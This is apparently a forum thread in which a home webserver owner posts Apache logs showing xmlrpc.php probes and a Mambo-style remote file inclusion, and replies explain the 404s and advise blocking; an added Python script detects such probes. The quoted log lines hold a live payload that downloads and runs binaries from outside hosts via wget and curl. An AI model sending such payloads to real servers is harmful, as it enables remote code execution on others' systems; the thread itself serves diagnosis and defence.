basicinstinct
asked on
My WebServer Logs - Is this an attack?
Hi, I found some weird entries on my webserver access logs. My webserver could only have been found by port scanning - it is running on my home PC and I use dynamic dns to locate it. It is basically just used by friends and family in other states to view pictures of my new baby son.
I found the following in my access log, all from an IP address in Japan, and I think it looks like someone trying to find a vulnerability in my webserver - I have obliterated part of the IP address in the extract below.
NOTE: All of the resources being requested do not exist on my site - I do not have anything like blog/ or blogs/ or any of the stuff being requested. It looks to me like someone is fishing around for some known vulnerabilities (and not finding any I hope).
I'd appreciate any advice on what you think the logs indicate... Is this an attack or something innocent?
I'm running apache2.
218.44.74.### - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:14 +1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:16 +1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:17 +1000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:19 +1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:21 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:23 +1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:24 +1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:25 +1000] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20hey;./hey;echo%20YYY;echo| HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:27 +1000] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20hey;./hey;echo%20YYY;echo| HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20hey;./hey;echo%20YYY;echo| HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
It's not a problem, however. Note that all the responses are "404". That means what was sought was not found. If this were my server I'd simply put a block on this IP address to prevent further attempts. You could try reporting this to the ISP that handles this IP but in most cases such requests get ignored.
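As an added example (not from this thread or any of its posters), a small Python script that does what the reply above suggests by eye: parse Apache combined-format lines, tag the two probe patterns from the question (blind POSTs to xmlrpc.php and a Mambo/Joomla-style remote file inclusion), and summarize per source IP whether anything got past a 404. The sample lines, the IPs 203.0.113.5 and 198.51.100.7, and the host attacker.example are constructed placeholders.

```python
import re
# Apache "combined" log format, as in the apache2 lines quoted above.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Probe families in the post: blind POSTs to xmlrpc.php under CMS paths, and a Mambo/Joomla-style RFI (a parameter whose value is a URL).
XMLRPC_PROBE = re.compile(r'/xmlrpc\.php$', re.I)
RFI_MARKER = re.compile(r'(^|&)[^=&]+=https?://', re.I)

def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry):
    """Tag a request as a known probe type, or None if it looks ordinary."""
    path, _, query = entry["target"].partition("?")
    if entry["method"] == "POST" and XMLRPC_PROBE.search(path):
        return "xmlrpc-probe"
    if RFI_MARKER.search(query):
        return "remote-file-inclusion"
    return None

def summarize(lines):
    """Per source IP: request count, 404s, successes (2xx/3xx) and probe tags seen."""
    report = {}
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue  # unparseable line; a real tool should count these too
        r = report.setdefault(e["ip"], {"requests": 0, "not_found": 0, "succeeded": 0, "tags": set()})
        code = int(e["status"])
        r["requests"] += 1
        r["not_found"] += int(code == 404)
        r["succeeded"] += int(200 <= code < 400)
        tag = classify(e)
        if tag:
            r["tags"].add(tag)
    return report

def should_block(r):
    """The advice above: only probe traffic, and every request failed -> block the source."""
    return bool(r["tags"]) and r["succeeded"] == 0 and r["not_found"] == r["requests"]
# Constructed sample modelled on the post; the IPs and attacker.example are placeholders.
UA = '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"'
SAMPLE = [
    f'203.0.113.5 - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 {UA}',
    f'203.0.113.5 - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 {UA}',
    f'203.0.113.5 - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST[option]=com_content'
    f'&mosConfig_absolute_path=http://attacker.example/cmd.txt? HTTP/1.1" 404 1016 {UA}',
    f'198.51.100.7 - - [06/Apr/2006:15:01:02 +1000] "GET /photos/baby01.jpg HTTP/1.1" 200 48213 {UA}',
]
```

Running `summarize(SAMPLE)` reports the scanner with three 404s, both probe tags and no successes (so `should_block` is true for it), while the family visitor fetching a photo is left alone.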
ASKER
Thanks for the response - the link to isc.sans.org from jss is very informative. Thanks also to jhance - I had not noticed the responses were all 404 - that's a relief. I will indeed block this IP - good idea.
I put the IP address of the attacker into a web browser and it came up with a legitimate website - some open source software developer company thingy.
Either the attacker originates from there, or I suppose it is more likely that the attacker has already compromised that webserver and is using it to relay attacks.
Either way, I intend to contact this website and ask them to PLEASE EXPLAIN. I will also write to the ISP. It is really disappointing - all I want to do is let dear old granny see pictures and videos of her new grandson, and someone out there tries to destroy this without giving it a second thought. Perhaps they think it makes them some sort of "l33t hacker" or something equally as silly, but they are just script kiddies, following the steps that someone else worked out for them. I'm upset, but I'll stop raving now.